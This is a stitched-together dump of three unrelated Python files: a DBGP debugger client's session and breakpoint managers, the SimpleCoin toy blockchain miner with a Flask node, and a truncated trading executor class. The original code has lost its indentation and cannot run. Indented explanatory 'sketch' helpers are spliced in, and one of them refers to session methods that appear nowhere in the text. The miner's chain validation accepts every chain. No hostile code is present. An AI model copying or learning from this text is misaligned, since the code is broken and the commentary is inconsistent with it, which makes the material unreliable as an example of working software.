log.debug('sending stdin [%s]!', data)
node = self.sendCommandWait(['stdin'], data)
return node.getAttribute('success')
#setStdinHandler(in koIFile file);
def setStdinHandler(self, file):
if not self._supportsOptionalCommand('stdin'):
log.debug('client does not support stdin!')
return 0
if file:
cmd = ['stdin', '-c', '1']
else:
cmd = ['stdin', '-c', '0']
node = self.sendCommandWait(cmd)
return node.getAttribute('success')
#setStdoutHandler(in koIFile file, in long mode);
def setStdoutHandler(self, file, mode):
node = self.sendCommandWait(['stdout', '-c', str(mode)])
return node.getAttribute('success')
#setStderrHandler(in koIFile file, in long mode);
def setStderrHandler(self, file, mode):
node = self.sendCommandWait(['stderr', '-c', str(mode)])
return node.getAttribute('success')
def _sessionSort(a, b):
return cmp(a.threadId, b.threadId)
class application:
def __init__(self, appMgr):
self.appMgr = appMgr
self._watchedvars = {}
self._sessions = {}
self.currentSession = None
self._stdin = self._stdout = self._stderr = None
def addSession(self, session):
log.debug('pid %r adding thread %r', session.applicationId, session.threadId)
self._sessions[session.threadId] = session
session.addApplication(self)
if not self.currentSession:
self.currentSession = session
def haveSession(self, session):
return session in self._sessions.values()
def releaseSession(self, session):
log.debug('removing session')
session.removeApplication()
del self._sessions[session.threadId]
# reset current thread now or quit
if len(self._sessions) < 1:
self.shutdown()
return
if session == self.currentSession:
self.currentSession = self._sessions.values()[0]
def getSessionList(self):
l = self._sessions.values()
l.sort(_sessionSort)
return l
def shutdown(self):
if self._stdin:
self._stdin.close()
for ses in self._sessions.keys():
self._sessions[ses].removeApplication()
if self._sessions.has_key(ses):
del self._sessions[ses]
self.appMgr.releaseApplication(self)
def sessionCount(self):
return len(self._sessions.keys())
#sendStdin(in wstring data, in long size);
def sendStdin(self, data, size):
        return self.currentSession.sendStdin(data, size)
#setStdinHandler(in koIFile file);
def setStdinHandler(self, file):
# XXX need to set for all sessions?
ok = self.currentSession.setStdinHandler(file)
if ok:
self._stdin = file
t = threading.Thread(target=self._stdinHandlerThread,
name="dbgp stdinHandler")
t.setDaemon(True)
t.start()
return ok
def _stdinHandlerThread(self):
log.debug('starting stdin thread')
while 1:
try:
#log.debug('reading console data...')
data = self._stdin.read(1024)
if not data:
self.currentSession.setStdinHandler(None)
log.debug('empty data from console, stdin closed')
break
log.debug('writing stdin data...[%s]', data)
self.sendStdin(data, len(data))
except Exception, e:
log.exception(e)
break
log.debug('quiting stdin thread')
#setStdoutHandler(in koIFile file, in long mode);
def setStdoutHandler(self, file, mode):
# XXX need to set for all sessions?
ok = self.currentSession.setStdoutHandler(file, mode)
if ok:
self._stdout = file
return ok
#setStderrHandler(in koIFile file, in long mode);
def setStderrHandler(self, file, mode):
# XXX need to set for all sessions?
ok = self.currentSession.setStderrHandler(file, mode)
if ok:
self._stderr = file
return ok
def outputHandler(self, stream, text):
log.debug('outputHandler [%r] [%r]', stream, text)
if stream == 'stdout' and self._stdout:
self._stdout.write(text)
elif stream == 'stderr' and self._stderr:
self._stderr.write(text)
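# _stdinHandlerThread above shows the pattern the application class uses for
# console forwarding: a background thread reads the local stdin file object in
# fixed-size chunks and pushes each chunk to the current session until the
# stream is exhausted.  The helper below is an illustrative sketch of that
# pump loop in isolation; the function name and arguments are not part of the
# DBGP code above.
def _pump_stream_sketch(read_chunk, forward, chunk_size=1024):
    """Read chunks via read_chunk(size) and pass them to forward(data) until
    read_chunk returns an empty value (EOF).  Illustrative only."""
    while 1:
        data = read_chunk(chunk_size)
        if not data:
            break
        forward(data)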
class appManager:
appList = {}
_lock = threading.Lock()
def __init__(self, debugMgr):
self.debugMgr = debugMgr
def getApplication(self, session):
self._lock.acquire()
try:
if session.applicationId not in self.appList:
log.debug('creating application class for pid %r',session.applicationId)
self.appList[session.applicationId] = application(self)
else:
log.debug('getting application class for pid %r',session.applicationId)
if not self.appList[session.applicationId].haveSession(session):
self.appList[session.applicationId].addSession(session)
finally:
self._lock.release()
return self.appList[session.applicationId]
def releaseApplication(self, appinst):
# kill command was issued, remove all references
appid = appinst.currentSession.applicationId
self._lock.acquire()
try:
if appid not in self.appList:
# XXX raise exception?
return
data = self.appList[appid]
del self.appList[appid]
finally:
self._lock.release()
def shutdown(self):
for app in self.appList.values():
app.shutdown()
class listener(dbgp.serverBase.listener):
def startNewSession(self, client, addr):
# start a new thread that is the host connection
# for this debugger session
sessionHost = session(self._session_host)
sessionHost.start(client, addr)
class breakpointManager:
_lock = threading.Lock()
_breakpoints = {} # mapping of breakpoint guid to breakpoint instance
def __init__(self):
self._guidCounter = 0 # used to assign a unique self._id to each bp
# Keep track of what debug sessions have what breakpoints and what
# ids they have assigned for them. Essentially this information is
# a cache because _technically_ we could query every debug session
# for this info every time.
# - Note: A session id is defined here as the 2-tuple
# (session.applicationId, session.threadId)
        # because I [TrentM] am not sure if threadIds are necessarily
        # unique across applications.
self._allSessionBPIDs = {
# <session id>: {<breakpoint guid>: <session bpid>, ...}
}
self._queuedSessionCommands = {
# <session id>: <FIFO of commands to send on break state>
# where each "command" is a 2-tuple:
# (<set|remove|update>, <tuple of args>)
# e.g.:
# ("set", (<breakpoint instance>,))
# ("remove", (<breakpoint instance>,))
# ("update", (<breakpoint instance>, <attrs to update>))
}
self._sessions = {
# <session id>: <session instance>
}
def _makeBreakpointGuid(self):
guid = self._guidCounter
self._guidCounter += 1
return guid
# The .addBreakpoint*() methods (and .addSpawnpoint()) are convenience
# methods for the more general .addBreakpoint() to add breakpoints of
# specific types.
def addBreakpointConditional(self, lang, cond, file, line, state,
temporary, hitValue, hitCondition):
bp = breakpoint()
bp.initConditional(lang, cond, file, line, state, temporary,
hitValue, hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointLine(self, lang, file, line, state, temporary,
hitValue, hitCondition):
bp = breakpoint()
bp.initLine(lang, file, line, state, temporary, hitValue,
hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointException(self, lang, exceptionName, state, temporary,
hitValue, hitCondition):
bp = breakpoint()
bp.initException(lang, exceptionName, state, temporary, hitValue,
hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointCall(self, lang, func, filename, state, temporary,
hitValue, hitCondition):
bp = breakpoint()
bp.initCall(lang, func, filename, state, temporary, hitValue,
hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointReturn(self, lang, func, filename, state, temporary,
hitValue, hitCondition):
bp = breakpoint()
bp.initReturn(lang, func, filename, state, temporary, hitValue,
hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointWatch(self, lang, watch, file, line, state,
temporary, hitValue, hitCondition):
bp = breakpoint()
bp.initWatch(lang, watch, file, line, state, temporary,
hitValue, hitCondition)
self.addBreakpoint(bp)
return bp
def addSpawnpoint(self, lang, filename, line, state):
sp = spawnpoint()
sp.init(lang, filename, line, state)
# we just stuff our spawnpoints into the breakpoints
self.addBreakpoint(sp)
return sp
def addBreakpoint(self, bp):
self._lock.acquire()
try:
bp._guid = self._makeBreakpointGuid()
self._breakpoints[bp.getGuid()] = bp
# Pass this new breakpoint onto any current debug session for
# which this is appropriate.
for session in self._sessions.values():
try:
self._setSessionBreakpointOrQueueIt(session, bp)
except (DBGPError, COMException), ex:
log.exception(ex)
pass # XXX should report to user somehow
self.postAddBreakpoint(bp)
finally:
self._lock.release()
def postAddBreakpoint(self, bp):
"""Method stub to allow subclasses to react to a breakpoint
addition while the breakpoints lock is held.
"""
pass
def removeBreakpoint(self, guid):
self._lock.acquire()
try:
if self._breakpoints.has_key(guid):
bp = self._breakpoints[guid]
del self._breakpoints[guid]
# Remove this breakpoint from any session that currently has it.
for sessId, sessionBPIDs in self._allSessionBPIDs.items():
if guid in sessionBPIDs:
session = self._sessions[sessId]
self._removeSessionBreakpointOrQueueIt(session, bp)
self.postRemoveBreakpoint(bp)
finally:
self._lock.release()
def postRemoveBreakpoint(self, bp):
"""Method stub to allow subclasses to react to a breakpoint
removal while the breakpoints lock is held.
"""
pass
def removeAllBreakpoints(self):
self._lock.acquire()
try:
# Remove all breakpoints from all current debug sessions.
#XXX:PERF _Could_ optimize this if necessary.
for sessId, sessionBPIDs in self._allSessionBPIDs.items():
for guid in sessionBPIDs.keys():
try:
session = self._sessions[sessId]
except KeyError, ex:
log.exception("Failed to find session %r", sessId)
continue
try:
bp = self._breakpoints[guid]
except KeyError, ex:
log.exception("Failed to find breakpoint %r in session %r", guid, sessId)
continue
self._removeSessionBreakpointOrQueueIt(session, bp)
self._breakpoints = {}
self.postRemoveAllBreakpoints()
finally:
self._lock.release()
def postRemoveAllBreakpoints(self):
"""Method stub to allow subclasses to react to a breakpoint list
reset while the breakpoints lock is held.
"""
pass
def updateBreakpoint(self, guid, newBp):
self._lock.acquire()
try:
bp = self._breakpoints[guid]
self.preUpdateBreakpoint(bp)
attrs = bp.update(newBp)
# Update the breakpoint in all current debug sessions that
# have this breakpoint.
# Note: We are presuming here that the breakpoint update did not
            # suddenly make this breakpoint applicable to a
# debug session when it previously was not.
for sessId, sessionBPIDs in self._allSessionBPIDs.items():
if guid in sessionBPIDs:
session = self._sessions[sessId]
self._updateSessionBreakpointOrQueueIt(session, bp, attrs)
self.postUpdateBreakpoint(bp, attrs)
finally:
self._lock.release()
def preUpdateBreakpoint(self, bp):
"""Method stub to allow subclasses to react _before_ a breakpoint
change while the breakpoints lock is held.
"bp" is the changed breakpoint.
"""
pass
def postUpdateBreakpoint(self, bp, attrs):
"""Method stub to allow subclasses to react to a breakpoint change
while the breakpoints lock is held.
"bp" is the changed breakpoint.
"attrs" is a list of breakpoint attributes that changed.
"""
pass
def getBreakpointsForLanguage(self, lang):
self._lock.acquire()
try:
            #XXX Currently the "not bp.language" case isn't needed: all
            # breakpoints have their language attribute set.
return [bp for bp in self._breakpoints.values()
if not bp.language or bp.language.lower() == lang.lower()]
finally:
self._lock.release()
#---- Managing session breakpoints.
# The first three methods are public and are meant to be called by the
# application (or some other session manager) and the session's.
# The rest are internal methods used to keep breakpoint info in sync
# between here and each session.
def setSessionBreakpoints(self, session):
"""Add the relevant breakpoints to this session.
Returns a newline-separated list of breakpoints (and reasons) that
did not get properly set on the session.
"""
#XXX Breakpoints should only be added once for each
# "application" in DBGP-parlance. In DBGP-land there is one
# "Session" per thread, yet all threads share the same breakpoints.
# At least, that is my understanding of the intention from Shane.
bplog.debug("breakpointManager.setSessionBreakpoints(session)")
breakpoints = [bp for bp in self._breakpoints.values()]
sessId = (session.applicationId, session.threadId)
self._sessions[sessId] = session
self._allSessionBPIDs[sessId] = {}
self._queuedSessionCommands[sessId] = []
failed = [] # list of bp's that did not get set on the session
for bp in breakpoints:
try:
self.__setSessionBreakpoint(session, bp)
except (DBGPError, COMException), ex:
errno, errmsg = getErrorInfo(ex)
failed.append("%s (%s)" % (bp.getName(), errmsg))
return '\n'.join(failed)
def releaseSession(self, session):
"""Release references to this session, it is shutting down."""
sessId = (session.applicationId, session.threadId)
if self._allSessionBPIDs.has_key(sessId):
del self._allSessionBPIDs[sessId]
if self._queuedSessionCommands.has_key(sessId):
del self._queuedSessionCommands[sessId]
if self._sessions.has_key(sessId):
del self._sessions[sessId]
def sendUpdatesToSession(self, session):
"""Any queued breakpoint/spawnpoint updates should be forwarded onto
session.
"""
self._sendQueuedSessionCommands(session)
def _setSessionBreakpointOrQueueIt(self, session, bp):
"""Set the given breakpoint on the given session and update local
cache information on this.
If the session is not in a break state, this command is queued up
until it is.
"""
if session.statusName not in ["break", "starting"]:
# DBGP client sessions can only accept breakpoint changes when
# in the break state. We will queue up this command for later.
# Note that the Python and Ruby back-ends *can* process
# async requests, but we don't have a way of processing
# the responses asynchronously, and tying the UI's guid
# with the back-end's breakpoint ID.
command = ("set", (bp,))
sessId = (session.applicationId, session.threadId)
self._queuedSessionCommands[sessId].append(command)
else:
self._sendQueuedSessionCommands(session)
self.__setSessionBreakpoint(session, bp)
def __setSessionBreakpoint(self, session, bp):
# We are REALLY setting the breakpoint on the session now.
sessId = (session.applicationId, session.threadId)
if bp.type == "spawn":
bpid = session.spawnpointSet(bp)
else:
bpid = session.breakpointSet(bp)
self._allSessionBPIDs[sessId][bp.getGuid()] = bpid
bplog.info("set '%s' %spoint on session %s: bpid='%s'",
bp.getName(), (bp.type=="spawn" and "spawn" or "break"),
sessId, bpid)
def _removeSessionBreakpointOrQueueIt(self, session, bp):
"""Remove the given breakpoint from the given session and update
local cache info.
If the session is not in a break state, this command is queued up
until it is.
"""
if session.statusName != "break":
# DBGP client sessions can only accept breakpoint changes when
# in the break state. We will queue up this command for later.
command = ("remove", (bp,))
sessId = (session.applicationId, session.threadId)
self._queuedSessionCommands[sessId].append(command)
else:
self._sendQueuedSessionCommands(session)
self.__removeSessionBreakpoint(session, bp)
def __removeSessionBreakpoint(self, session, bp):
# We are REALLY removing the breakpoint from the session now.
sessId = (session.applicationId, session.threadId)
sessionBPIDs = self._allSessionBPIDs[sessId]
guid = bp.getGuid()
bpid = sessionBPIDs[guid] # the session's ID for this bp
if bp.type == "spawn":
session.spawnpointRemove(bpid)
else:
session.breakpointRemove(bpid)
del sessionBPIDs[guid]
bplog.info("removed '%s' %spoint from session %s",
bp.getName(), (bp.type=="spawn" and "spawn" or "break"),
sessId)
def _updateSessionBreakpointOrQueueIt(self, session, bp, attrs):
"""Update the given attributes of the given breakpoint on the
given debug session.
If the session is not in a break state, this command is queued up
until it is.
"""
if session.statusName != "break":
# DBGP client sessions can only accept breakpoint changes when
# in the break state. We will queue up this command for later.
command = ("update", (bp, attrs))
sessId = (session.applicationId, session.threadId)
self._queuedSessionCommands[sessId].append(command)
else:
self._sendQueuedSessionCommands(session)
self.__updateSessionBreakpoint(session, bp, attrs)
def __updateSessionBreakpoint(self, session, bp, attrs):
# We are REALLY updating the breakpoint on the session now.
sessId = (session.applicationId, session.threadId)
sessionBPIDs = self._allSessionBPIDs[sessId]
guid = bp.getGuid()
bpid = sessionBPIDs[guid] # the session's ID for this bp
if bp.type == "spawn":
session.spawnpointUpdate(bpid, bp, attrs)
else:
session.breakpointUpdate(bpid, bp, attrs)
bplog.info("updated '%s' %spoint on session %s: attrs=%s",
bp.getName(), (bp.type=="spawn" and "spawn" or "break"),
sessId, attrs)
def _sendQueuedSessionCommands(self, session):
"""Send on any queued up commands for this session."""
sessId = (session.applicationId, session.threadId)
queuedCommands = self._queuedSessionCommands.get(sessId, [])
try:
for commandType, args in queuedCommands:
if commandType == "set":
bp = args[0]
self.__setSessionBreakpoint(session, bp)
elif commandType == "remove":
bp = args[0]
self.__removeSessionBreakpoint(session, bp)
elif commandType == "update":
bp, attrs = args
self.__updateSessionBreakpoint(session, bp, attrs)
finally:
self._queuedSessionCommands[sessId] = []
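# The breakpoint manager above can only push breakpoint changes to a session
# while it is in a break state, so _setSessionBreakpointOrQueueIt() and its
# siblings queue the command and _sendQueuedSessionCommands() flushes the
# queue once the session breaks.  The small class below illustrates that
# queue-then-flush pattern in isolation; its name and methods are not part of
# the DBGP code above.
class _CommandQueueSketch:
    def __init__(self):
        self._queued = []  # FIFO of (command, args) tuples
    def submit(self, in_break_state, command, args, send):
        # While the session is running, remember the command; once the
        # session breaks, flush everything queued, then send the new one.
        if not in_break_state:
            self._queued.append((command, args))
        else:
            self.flush(send)
            send(command, args)
    def flush(self, send):
        queued, self._queued = self._queued, []
        for command, args in queued:
            send(command, args)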
class manager:
def __init__(self):
self._server_key = None
self._proxyAddr = ''
self._proxyPort = 0
self.proxyClientAddress = ''
self.proxyClientPort = 0
self.appManager = appManager(self)
self.breakpointManager = self.getBreakpointManager()
self._listener = None
def getBreakpointManager(self):
# Allow this to be overridden.
return breakpointManager()
def getURIMappings(self):
# overriden by IDE interface to provide url to local path mapping
# to the debugger engine
return []
def setKey(self, key):
self._server_key = key
# key change, recycle the proxy if necessary
if self._proxyAddr and self._listener:
self._stopProxy()
self._initProxy()
def setProxy(self, address, port):
if self._proxyAddr and self._listener:
self._stopProxy()
self._proxyAddr = address
self._proxyPort = port
if self._proxyAddr and self._listener:
self._initProxy()
def _initProxy(self):
log.debug('manager starting proxy...')
if not self._proxyPort:
self._proxyPort = 9001
if not self._proxyAddr:
self._proxyAddr = '127.0.0.1'
try:
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy_socket.connect((self._proxyAddr,self._proxyPort))
command = u'proxyinit -p %d -k %s -m 1' % \
(self._listener._port,
self._server_key)
proxy_socket.send(command.encode('utf-8'))
resp = proxy_socket.recv(1024)
proxy_socket.close()
dom = minidom.parseString(resp)
root = dom.documentElement
if root.getAttribute('success') == '1':
self.proxyClientAddress = root.getAttribute('address')
self.proxyClientPort = int(root.getAttribute('port'))
except Exception, e:
self.stop()
raise DBGPError("the debugger proxy could not be contacted.")
def _stopProxy(self):
log.debug('manager stopping proxy...')
try:
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy_socket.connect((self._proxyAddr,self._proxyPort))
command = u'proxystop -k %s' % self._server_key
proxy_socket.send(command.encode('utf-8'))
resp = proxy_socket.recv(1024)
proxy_socket.close()
self.proxyClientAddress = ''
self.proxyClientPort = 0
except Exception, e:
            # if we cannot stop the proxy when we're stopping, let's let it go
log.debug('unable to contact proxy to stop proxying')
def listen(self, address, port):
log.debug('manager starting listener...')
self._listener = listener(self)
_address, _port = self._listener.start(address,port)
if self._proxyAddr:
self._initProxy()
return (_address, _port)
def stop(self):
if not self._listener:
log.debug('manager stop called, but no listener')
return
if self._proxyAddr:
self._stopProxy()
log.debug('manager stopping listener...')
self._listener.stop()
self._listener = None
def shutdown(self):
self.stop()
self.appManager.shutdown()
def getApplicationList(self):
return self.appManager.appList.values()
##################################################################
# session callback functions
##################################################################
def onConnect(self, session, client, addr):
# before any communication, we can decide if we want
# to allow the connection here. return 0 to deny
log.info("Connection received from %r:%r",addr[0],addr[1])
return 1
def initHandler(self, session, init):
# this is called once during a session, after the connection
# to provide initialization information. initNode is a
# minidom node. If we have a session key, it will be validated
# later, and the key doesn't matter for us.
if self._server_key and not init.getAttribute('session'):
idekey = init.getAttribute('idekey')
if idekey != self._server_key:
session.stop()
log.info("Session stopped, incorrect key [%s]", idekey)
return 0
self.appManager.getApplication(session)
# XXX notify init listeners
return 1
def notifyInit(self, session, init):
# should be overridden
pass
def notifyStartup(self, session, init):
# should be overridden
pass
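# The session class above pairs every command it sends with the response that
# carries the same transaction_id: _responseHandler() files the response node
# under its tid and notifies a condition variable, while _waitResponse() keeps
# checking that dictionary (waking up at most once a second) until the id
# appears or the timeout expires.  The class below is an illustrative sketch
# of that rendezvous on its own; it is not part of the DBGP implementation.
import threading
import time

class _ResponseWaiterSketch:
    def __init__(self):
        self._responses = {}
        self._cv = threading.Condition()
    def post(self, tid, node):
        # Called from the reader thread when a response arrives.
        with self._cv:
            self._responses[tid] = node
            self._cv.notify_all()
    def wait(self, tid, timeout=5):
        # Called from the command thread; mirrors _waitResponse() above.
        deadline = time.time() + timeout
        with self._cv:
            while tid not in self._responses:
                remaining = deadline - time.time()
                if remaining <= 0:
                    raise RuntimeError('timed out waiting for response %r' % tid)
                self._cv.wait(remaining)
            return self._responses.pop(tid)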
|
miner.py
|
import time
import hashlib
import json
import requests
import base64
from flask import Flask, request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Returns a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
"""Creates the unique hash for the block. It uses sha256."""
sha = hashlib.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
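# hash_block() above folds the block's index, timestamp, data and the
# previous block's hash into one SHA-256 digest, which is what "chains"
# consecutive blocks together.  The helper below is a small illustrative
# check of that linkage; it is not used anywhere by the miner.
def _chain_link_demo():
    """Build two blocks and confirm the second one references the first."""
    first = Block(0, time.time(), {"proof-of-work": 9, "transactions": None}, "0")
    second = Block(1, time.time(), {"proof-of-work": 18, "transactions": []}, first.hash)
    assert second.previous_hash == first.hash
    return first, second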
def create_genesis_block():
"""To create each block, it needs the hash of the previous one. First
block has no previous, so it must be created manually (with index zero
and arbitrary previous hash)"""
return Block(0, time.time(), {
"proof-of-work": 9,
"transactions": None},
"0")
# Node's blockchain copy
BLOCKCHAIN = [create_genesis_block()]
""" Stores the transactions that this node has in a list.
If the node you sent the transaction adds a block
it will get accepted, but there is a chance it gets
discarded and your transaction goes back as if it was never
processed"""
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof, blockchain):
# Creates a variable that we will use to find our next proof of work
incrementer = last_proof + 1
    # Keep incrementing the incrementer until it is divisible by 7919
    # and by the proof of work of the previous block in the chain
start_time = time.time()
while not (incrementer % 7919 == 0 and incrementer % last_proof == 0):
incrementer += 1
# Check if any node found the solution every 60 seconds
if int((time.time()-start_time) % 60) == 0:
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain:
# (False: another node got proof first, new blockchain)
return False, new_blockchain
# Once that number is found, we can return it as a proof of our work
return incrementer, blockchain
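# For the genesis proof of 9, the loop above keeps counting up from 10 until
# it reaches a value divisible both by 7919 and by 9, i.e. 9 * 7919 = 71271.
# The helper below is an illustrative shortcut for that search (it ignores
# the periodic consensus check) and is not called by the miner.
def _expected_proof_sketch(last_proof):
    """Smallest multiple of both 7919 and last_proof, assuming last_proof is
    not itself already a multiple of 7919.  Illustrative only."""
    import math
    return last_proof * 7919 // math.gcd(last_proof, 7919)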
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
"""Mining is the only way that new coins can be created.
        In order to prevent too many coins from being created, the process
is slowed down by a proof of work algorithm.
"""
# Get the last proof of work
last_block = BLOCKCHAIN[-1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if not proof[0]:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# ...we reward the miner by adding a transaction
# First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(MINER_NODE_URL + "/txion?update=" + MINER_ADDRESS).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
# Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({
"from": "network",
"to": MINER_ADDRESS,
"amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {
"proof-of-work": proof[0],
"transactions": list(NODE_PENDING_TRANSACTIONS)
}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({
"index": new_block_index,
"timestamp": str(new_block_timestamp),
"data": new_block_data,
"hash": last_block_hash
}) + "\n")
a.send(BLOCKCHAIN)
requests.get(MINER_NODE_URL + "/blocks?update=" + MINER_ADDRESS)
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
"""Validate the submitted chain. If hashes are not correct, return false
block(str): json
"""
return True
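# validate_blockchain() above is a stub that accepts every submitted chain.
# A fuller check would recompute each block's hash and make sure every
# previous_hash really points at the block before it.  The sketch below
# assumes a list of Block objects; find_new_chains() actually hands this
# function parsed JSON, so a real implementation would have to adapt.  It is
# illustrative only and is not wired into the node.
def _validate_block_objects_sketch(chain):
    for prev, block in zip(chain, chain[1:]):
        if block.previous_hash != prev.hash or block.hash != block.hash_block():
            return False
    return True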
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
# Converts our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": str(block.index),
"timestamp": str(block.timestamp),
"data": str(block.data),
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json)
return chain_to_send
@node.route('/txion', methods=['GET', 'POST'])
def transaction():
"""Each transaction sent to this node gets validated and submitted.
Then it waits to be added to the blockchain. Transactions only move
    coins, they don't create them.
"""
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'], new_txion['signature'], new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
# Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
"""Verifies if the signature is correct. This is used to prove
it's you (and not someone else) trying to do a transaction with your
address. Called when a user tries to submit a new transaction.
"""
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
# Try changing into an if/else statement as except is too broad.
try:
return vk.verify(signature, message.encode())
except:
return False
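# validate_signature() above expects the sender's address to be the base64 of
# the raw SECP256k1 verifying-key bytes and the signature to be the base64 of
# an ecdsa signature over the message.  The helper below shows how a client
# could produce such a pair; it is an illustrative sketch (the function name
# is not part of SimpleCoin) using only the ecdsa and base64 APIs already
# imported above.
def _make_signed_transaction_sketch(message):
    """Return (public_key, signature) strings that validate_signature accepts."""
    sk = ecdsa.SigningKey.generate(curve=ecdsa.SECP256k1)
    public_key = base64.b64encode(sk.get_verifying_key().to_string()).decode()
    signature = base64.b64encode(sk.sign(message.encode())).decode()
    return public_key, signature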
def welcome_msg():
print(""" =========================================\n
SIMPLE COIN v1.0.0 - BLOCKCHAIN SYSTEM\n
=========================================\n\n
You can find more help at: https://github.com/cosme12/SimpleCoin\n
    Make sure you are using the latest version or you may end up on
a parallel chain.\n\n\n""")
if __name__ == '__main__':
welcome_msg()
# Start mining
a, b = Pipe()
p1 = Process(target=mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
# Start server to receive transactions
    p2 = Process(target=node.run, args=())
p2.start()
|
executor.py
|
import time
import threading
import traceback
import pickle
import numpy as np
from ..logger import create_null_logger
from .utils import (
fetch_historical_predictions,
fetch_current_predictions,
df_weight_to_purchase_params_list,
blend_predictions,
floor_to_execution_start_at,
calc_target_positions,
create_model_selection_params
)
day_seconds = 24 * 60 * 60
class Executor:
def __init__(self, store=None, tournament_id=None, time_func=None, evaluation_periods=None,
model_selector=None, market_data_store=None, budget_rate=None,
symbol_white_list=None, logger=None, redis_client=None):
self._store = store
self._tournament = store.fetch_tournament(tournament_id)
self._tournament_id = tournament_id
self._time_func = time.time if time_func is None else time_func
self._interval_sec = 15
self._logger = create_null_logger() if logger is None else logger
self._redis_client = redis_client
self._evaluation_periods = evaluation_periods
self._model_selector = model_selector
self._market_data_store = market_data_store
self._symbol_white_list = symbol_white_list.copy()
self._budget_rate = budget_rate
self._thread = None
self._thread_terminated = False
self._initialized = False
# redis
def _get_purchase_info(self, execution_start_at):
key = _purchase_info_key(execution_start_at)
value = self._redis_client.get(key)
if value is None:
return None
return pickle.loads(value)
def _set_purchase_info(self, execution_start_at, info):
key = _purchase_info_key(execution_start_at)
self._redis_client.set(key, pickle.dumps(info))
self._redis_client.expireat(key, execution_start_at + 2 * 24 * 60 * 60)
def start_thread(self):
self._thread = threading.Thread(target=self._run)
self._thread.start()
def terminate_thread(self):
self._thread_terminated = True
self._thread.join()
# called from other thread
def get_target_positions(self, timestamp: int):
execution_start_at, t = floor_to_execution_start_at(timestamp, self._tournament)
execution_time = self._tournament['execution_time']
df_blended_list = []
round_count = day_seconds // execution_time
for i in range(round_count + 1):
df_blended_list.append(self._get_blended_prediction(
execution_start_at=execution_start_at - execution_time * i,
without_fetch_events=i > 0,
))
df_blended_list = list(reversed(df_blended_list))
return calc_target_positions(
t,
df_blended_list,
)
def _get_blended_prediction(self, execution_start_at: int, without_fetch_events=False):
